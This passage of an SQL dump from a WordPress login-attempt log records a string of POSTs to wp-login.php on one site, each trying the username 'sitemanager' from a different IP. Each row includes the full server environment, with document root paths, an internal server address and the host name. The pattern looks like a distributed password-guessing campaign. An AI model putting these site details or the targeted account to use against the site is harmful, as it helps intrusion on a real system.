Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50560\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.137.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746009199.1638651;s:12:\"REQUEST_TIME\";i:1746009199;}}','66.29.137.63',0,'2025-04-30 16:03:20','1970-01-01 00:00:00'),(94529,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60298\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.91\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746009573.4487579;s:12:\"REQUEST_TIME\";i:1746009573;}}','198.54.114.91',0,'2025-04-30 16:09:35','1970-01-01 00:00:00'),(94530,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52198\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746009946.8746059;s:12:\"REQUEST_TIME\";i:1746009946;}}','209.172.2.50',0,'2025-04-30 16:15:48','1970-01-01 00:00:00'),(94531,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34852\";s:11:\"REMOTE_ADDR\";s:14:\"31.214.174.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746010324.012507;s:12:\"REQUEST_TIME\";i:1746010324;}}','31.214.174.194',0,'2025-04-30 16:22:05','1970-01-01 00:00:00'),(94532,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48170\";s:11:\"REMOTE_ADDR\";s:15:\"162.214.124.144\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746010707.553988;s:12:\"REQUEST_TIME\";i:1746010707;}}','162.214.124.144',0,'2025-04-30 16:28:29','1970-01-01 00:00:00'),(94533,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55650\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.120.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746011468.9891951;s:12:\"REQUEST_TIME\";i:1746011468;}}','198.54.120.4',0,'2025-04-30 16:41:10','1970-01-01 00:00:00'),(94534,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35668\";s:11:\"REMOTE_ADDR\";s:13:\"190.92.174.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746011845.992347;s:12:\"REQUEST_TIME\";i:1746011845;}}','190.92.174.31',0,'2025-04-30 16:47:27','1970-01-01 00:00:00'),(94535,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53686\";s:11:\"REMOTE_ADDR\";s:15:\"103.179.190.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746012224.3052061;s:12:\"REQUEST_TIME\";i:1746012224;}}','103.179.190.244',0,'2025-04-30 16:53:46','1970-01-01 00:00:00'),(94536,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36386\";s:11:\"REMOTE_ADDR\";s:14:\"162.240.232.97\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746012601.309031;s:12:\"REQUEST_TIME\";i:1746012601;}}','162.240.232.97',0,'2025-04-30 17:00:03','1970-01-01 00:00:00'),(94537,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55440\";s:11:\"REMOTE_ADDR\";s:14:\"220.158.234.47\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746013358.701364;s:12:\"REQUEST_TIME\";i:1746013358;}}','220.158.234.47',0,'2025-04-30 17:12:40','1970-01-01 00:00:00'),(94538,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45710\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746013739.355094;s:12:\"REQUEST_TIME\";i:1746013739;}}','78.155.192.110',0,'2025-04-30 17:19:01','1970-01-01 